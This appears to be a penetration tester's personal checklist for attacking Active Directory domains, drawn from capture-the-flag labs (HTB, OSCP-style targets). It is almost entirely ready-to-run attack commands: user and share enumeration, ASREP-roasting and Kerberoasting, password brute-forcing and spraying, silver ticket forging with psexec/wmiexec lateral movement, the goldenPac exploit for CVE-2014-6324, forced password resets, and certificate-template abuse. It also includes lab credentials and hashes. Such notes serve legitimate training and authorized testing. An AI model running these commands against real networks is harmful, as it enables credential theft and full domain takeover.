🎄Active Directory Checklist

Checklist for my sanity

Unauthenticated

• Unauthenticated

  • Get Hostnames

    • nxc smb 192.168.209.1

    • Use nslookup with server set to DC/NS server and ask for localhost or ip

      • nslookup ; server <DC/NS server> ; <IP>

    • run dnsrecon on the subnet dnsrecon -d <domain> -r <ip range>

  • Setup /etc/hosts

    • nxc smb [IP]

    • Alternatively add the name server to /etc/resolv.conf

  • Sync time for kerberos if lapse

    • sudo ntpdate [IP]

    • `sudo rdate -n [IP]

  • Nmap TCP scan

    • Host identification

      • sudo nmap -T4 -p 21,22,23,25,53,69,80,81,88,110,111,119,123,137-139,161,389,443,445,465,500,512-513,548,587,623-624,993-995,1099,11211,1241,1433-1434,1521,1723,2049,2483-2484,27017-27019,3268-3269,3306,3389,4333,4786,4848,5060-5061,5432,5800,5900-5901,5985-5986,6000-6001,7001,8000,8080,8181,8443,10000,16992-16993,32764 -v 172.16.1.0/24 -oA scans/nmap-pulse-172.16.1.0

        • cat scans/nmap-pulse-172.16.1.0.gnmap|grep ': Up'|cut -d ' ' -f2 > active_hosts

        • [ ]

    • sudo nmap -sV -sC -oA scans/nmap-tcp-initial -v

    • sudo nmap -sV -sC -oA scans/nmap-tcp-full -p- -v Tip: If DC make sure time is correct for kerberos port

    • Use nslookup with server set to DC/NS server and ask for localhost or ip. If ipv6 addr found;

      • nmap -6 [ipv6]

  • Nmap UDP scan

    • sudo nmap -sU -p 53,69,111,161,500,623,2049 --open -oA scans/nmap-udp -iL targets.txt

  • Get Domain Info

    • ldapsearch -x -H ldap://<ip> -s base namingcontexts

    • ldapsearch -x -H ldap://10.129.53.189 -b 'dc=egotistical-bank,dc=local' -s sub '*'

    • nxc smb resolute -u '' -p '' --pass-pol

  • Dump AD Users (DC)

    • nxc smb 192.168.209.1 -u '' -p '' --users

    • nxc ldap resolute -u '' -p '' -M user-desc

    • rpcclient -U '' 10.129.96.155

      • enumdomusers

      • querydispinfo

    • ldapsearch -LLL -x -H ldap://192.168.129.100 -b 'oscp.exam' -s sub '(objectclass=person)' '*'|grep -i samaccountname|cut -d ':' -f 2|sed 's/ //g'>>users Tip: Did you get all users? Remember svc-alfresco?

    • impacket-GetADUsers -dc-ip 10.129.227.113 -dc-host dc01 "timelapse.htb/" -all -debug Tip: if you are able to dump users, read through the output to look for plain text passwords in the description column. Also try Asreproasting And brute-forcing

  • Enumerate anonymous/null file shares

    • nxc smb 192.168.209.1 -u '' -p '' --shares

    • nxc smb 192.168.209.1 -u 'a' -p '' --shares | tee scans/nxc-anon-shares.log

    • smbclient -L //192.168.209.1

    • smbmap -d megabank.local -u '' -H resolute -r --depth 20|tee scans/smbmap-anon-recursive.log

    • smbmap -d megabank.local -u 'a' -H resolute -r --depth 20|tee scans/smbmap-anon-recursive.log

    • smbmap -d cascade.local -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'

    • Check files closely with exiftool and strings

    • Mount shares and test writability

  • Users accounts

    • Enumerate Users

      • ~/Documents/loadables/tools/kerbrute userenum -d htb.local --dc rabbit /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t 500

      • nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='oscp.exam',userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt -Pn 192.168.129.100

      • Enumerate from files found with exif tool

    • Brute-force Accounts

      • nxc ldap monteverde -u users -p users --no-bruteforce Tip: try this first

      • Create a word list from a user dump

        • hashcat users -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/leetspeak.rule --stdout > pguesses Tip: you could add months and seasons to this. NSA rules are really good.

      • nxc ldap monteverde -u users -p users

      • kerbrute bruteuser -d oscp.exam --dc dc01 /usr/share/wordlists/fasttrack.txt --verbose lisa Tip: Doesn't create event code 4624 to indicate a failed password

      • cat users | xargs -t -I USR ~/loadables/tools/kerbrute bruteuser --dc resolute -d megabank.local -t 200 /usr/share/wordlists/seclists/Passwords/Default-Credentials/default-passwords.txt --verbose USR Check all accounts against the users we found user = user pass = user

  • ASRepRoast

    • (&(&(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))))

    • nxc ldap [DC IP] -u users -p '' --asreproast hashes/asreproast.hash

    • impacket-GetNPUsers -dc-ip sauna -request -usersfile users -outputfile hashes/asreproast.hash 'egotisticalbank/'

Authenticated

Tip: If authenticated, vpn could be switched to VM Win host to make life easier for certain attacks.

• Authenticated

  • Shares/Policy

    • nxc smb hathor -u users -p passwords -k -d windcorp.htb -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=finds

    • smbmap -d <domain> -u melanie -p 'Welcome123!' -H resolute -r --depth 20

    • smbmap -d cascade.local -u 'r.thompson' -p rY4n5eva -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'

    • Check files closely with exiftool and strings

    • Use dnspy to decompile fishy exec files

    • sniff traffic of exec files

  • Kerberoast

    • (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))

    • nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting hashes/kerbroast

    • impacket-GetUserSPNs -request -dc-ip 10.129.249.79 -target-domain active.htb active.htb/svc_tgs

  • Bloodhound / ldapsearch / AD Users

    • bloodhound-python -u 'ldap' -c all -d support.htb -ns 10.129.239.21 -p 'pass' --dns-tcp

      • Set Objects as owned as you go

      • Look for GenericAll Privileges given direct or thorough groups. Use the Outbound object control to view these privileges.

    • Sharphound.exe -c all -d active.htb --domaincontroller 10.10.10.100 Tip: Run this from a runas netonly after grabbing a ticket with dir whackwhack dcip

    • nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All Tip: Make sure ~/.nxc/nxc.conf is configured. THIS DOESNT WORK FOR ME

    • ldapdomaindump -u 'support.htb\ldap' -p $(cat ../passwords) --no-json --no-grep -r dc

    • ldapsearch -H ldap://support.htb -b 'dc=support,dc=htb' -D 'ldap@support.htb' -w 'pass' -s sub '(objectclass=user)' 'info' 'description' Tip: Use 'star' and look at ALL fields for users. Info and Description especially

    • ldapsearch -H ldap://dc1 -b 'dc=scrm,dc=local' -U 'ksimpson' -W -s sub '(objectclass=user)' 'memberof'

    • Analyze full domain dump for anomalies

      • cat domain.ldif|awk '{print $1}'|sort | uniq -c | sort -nr

    • Dump AD Users (DC)

      • nxc ldap dc -u ldap -p passwords --users

  • Silver Ticket

    • Need NTLM hash of password

      • python3 -c "import hashlib;r=hashlib.new('md4','REGGIE1234ronnie'.encode('utf-16le')).digest().hex();print(r)"

    • Need domain SID

      • nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid

      • Get-ADDomain

      • impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson

      • [ ]

    • impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local administrator Tip: invalid spn throws ioc to blues. Try hard

      • export KRB5CCNAME=<TGS_ccache_file>

      • impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

      • impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

      • impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

      • impacket-mssqlclient <domain_name>/<user_name>@<remote_hostname> -k -no-pass

  • Password Spray Tip: New passwords found are worth a spray

    • ~/Documents/loadables/tools/kerbrute passwordspray -d search.htb --dc research -t 500 users '@3ONEmillionbaby'

    • nxc ldap research -u users -p '@3ONEmillionbaby' --continue-on-success

  • Golden Ticket Forgery CVE-2014-6324

    • impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis

  • Can you change passwords?

    • rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'

  • Is this a Certificate Authority with vulnerable cert? https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation

    • certipy-ad find -vulnerable -dc-ip 10.129.228.253 -enabled -u ryan.cooper@sequel.htb -p NuclearMosquito3 Tip: https://github.com/ly4k/Certipy